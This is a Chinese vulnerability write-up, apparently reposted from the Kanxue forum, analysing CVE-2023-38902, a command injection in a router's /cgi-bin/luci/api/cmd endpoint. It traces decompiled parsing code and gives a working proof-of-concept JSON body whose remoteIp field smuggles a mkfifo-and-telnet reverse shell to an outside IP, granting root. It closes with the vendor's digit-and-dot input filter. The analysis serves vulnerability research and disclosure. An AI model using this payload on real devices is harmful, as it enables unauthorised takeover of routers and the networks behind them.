remotePwd字段注入命令是不成功的。parse_obj2_cmd函数中对json数据解析时,对于remotePwd字段的处理是存在Bug的,它限制了remotePwd字段要为array类型(如下代码所示),但是前端对于array类型的remotePwd会报错。remotePwd字段是string类型,实际上代码应该是json_object_get_type(v37) == 6。这就导致设置remotePwd类型时要么是前端报错,要么是二进制程序中判断这个类型错误,从而阴差阳错的阻止了从这里进行注入。if ( json_object_object_get_ex(v38, "remotePwd", &v37) == 1 && json_object_get_type(v37) == 5 )
204固件中,它的功能实现都是由lua语言来完成的,最终命令执行的漏洞点如下(fetch_sid函数的参数password就为remotePwd字段),因此在该固件版本中可以从remotePwd字段进行注入,而之后的版本因为Bug的原因无法进行注入。
攻击报文为什么这么构造?
{ "method": "devCap.get", "params": { "module": "123", "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)" } }
method和params不能为空,因为这里有如下检查,如果他们不存在的话会直接返回-1。v6 = json_object_object_get_ex(v3, "params", &v18); v7 = v4; if ( v6 != 1 ) { LABEL_27: json_object_put(v7); return -1; } if ( json_object_object_get_ex(v4, "method", v19) != 1 ) { LABEL_26: v7 = v4; goto LABEL_27; }
module也必须存在,并且module字段是params中的一个值。可以看到这里解析出了params,给到v38。module字段是从v38也就是params中解析出来的,如果module字段不存在的话,会执行return 0:if ( json_object_object_get_ex(a1, "params", &v38) != 1 )// { ...... } ...... if ( json_object_object_get_ex(v38, "module", &v37) != 1 ) { uf_log_printf(uf_log, "ERROR (%s %s %d)obj_module is null", "sgi.c", "parse_obj2_cmd", 289); goto LABEL_109; } LABEL_109: cmd_msg_free(v3); return 0;
devCap,下面if(v3 == 3)才可以执行到remote_call函数。if ( v3 == 3 )//因为操作类型设置为devCap,所以这个if可以进来 { ...... v5 = *(const char **)(a1 + 20);//这里取了remoteIp字段 if ( !v5 || !*v5 )//判断remoteIp字段是否存在 goto LABEL_250; v6 = a1; if ( !is_self_ip(*(_DWORD *)(v6 + 20)) )//is_self_ip函数正常情况下返回的是0,这个if可以进入 { remote_call((int *)a1, (const char **)a2);//后续的漏洞触发是在这个函数中 }
get是因为在Lua文件中只有opt[i]为get的时候才在devCap表中定义了字符串get所对应函数:lua if opt[i] == "get" then devCap[opt[i]] = function(params) local model = require "dev_cap" params.method = opt[i] params.cfg_cmd = "dev_cap" local data, back, ip, password, shell = doParams(params) return fetch(model.fetch, shell, params, opt[i], params.module, ip, password) end end
四 攻击演示
217。但搭建了219的仿真环境也是可以攻击成功的。
Burp Suite抓包,拿到auth的值:
/cgi-bin/luci/api/cmd发送POST报文。POC
{ "method": "devCap.get", "params": { "module": "123", "remoteIp": "$(mkfifo /tmp/test;telnet 192.168.110.171 6666 0</tmp/test|/bin/sh > /tmp/test)" } }
攻击效果
shell成功,此时拿到了路由器的最高权限:
五 修复方案
226版本,对上述漏洞发布了补丁。detect_remoteIp_invalid函数,该函数检查了remoteIP字段是否为纯数字或者字符.,因为正常的IP应该为xx.xx.xx.xx。这相当于对命令注入的字段做了一个过滤。int __fastcall detect_remoteIp_invalid(char *buf) { int len; // $v0 char *v3; // $a0 char *v4; // $v0 int v5; // $v1 len = strlen(buf); v3 = buf; v4 = &buf[len]; while ( v3 != v4 ) { v5 = *v3; if ( (unsigned __int8)(v5 - 48) < 0xAu ) { ++v3; } else { ++v3; if ( v5 != '.' ) { uf_log_printf( uf_log, "ERROR (%s %s %d)invalid char: %c, need [number][.][number]!", "sgi.c", "detect_remoteIp_invalid", 273, v5); return -1; } } } return 0; }
参考信息
看雪ID:ZIKH26
https://bbs.kanxue.com/user-home-953233.htm
原文始发于微信公众号(看雪学苑):CVE-2023-38902的详细研究
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论